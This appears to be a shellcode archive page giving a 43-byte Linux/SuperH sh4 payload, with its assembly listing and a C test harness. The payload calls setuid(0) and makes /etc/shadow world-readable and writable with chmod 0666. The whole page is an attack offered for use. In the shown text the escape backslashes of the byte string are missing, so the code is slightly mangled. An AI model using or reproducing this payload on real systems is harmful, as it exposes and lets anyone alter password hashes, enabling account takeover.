[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : Linux/SuperH - sh4 - setuid(0) - chmod("/etc/shadow", 0666) - exit(0) - 43 bytes
# Published : 2011-06-22
# Author :
# Previous Title : Linux/MIPS - execve /bin/sh - 48 bytes
# Next Title : Linux/SuperH - sh4 - setuid(0) ; execve("/bin/sh", NULL, NULL) - 27 bytes


/*
** Title:     Linux/SuperH - sh4 - setuid(0) - chmod("/etc/shadow", 0666) - exit(0) - 43 bytes
** Date:      2011-06-22
** Tested on: Debian-sh4 2.6.32-5-sh7751r
** Author:    Jonathan Salwan - twitter: @jonathansalwan
**
** http://shell-storm.org
**
**
** seteuid:
** 	mov 	#23, r3
** 	xor	r4, r4
** 	trapa 	#2
** chmod:
** 	mov	#15, r3
** 	mova	@(24, pc), r0
** 	mov	r0, r4
** 	mov	#87, r8
** 	mov	#5, r9
** 	mul.l	r8, r9
** 	sts	macl, r5
** 	add	#3, r5
** 	trapa	#2
** exit:
** 	xor	r3, r3
** 	mov	#1, r3
** 	xor	r4, r4
** 	trapa 	#2
** file:
** 	.string "/etc/shadow"
**
*/

#include <stdio.h>
#include <string.h>

char *SC = "x17xe3x4ax24x02xc3x0fxe3x05xc7x03"
           "x64x57xe8x05xe9x87x09x1ax05x03x75"
           "x02xc3x3ax23x01xe3x4ax24x02xc3x2f"
           "x65x74x63x2fx73x68x61x64x6fx77";

int main(void)
{
  fprintf(stdout,"Length: %dn",strlen(SC));
  (*(void(*)()) SC)();
}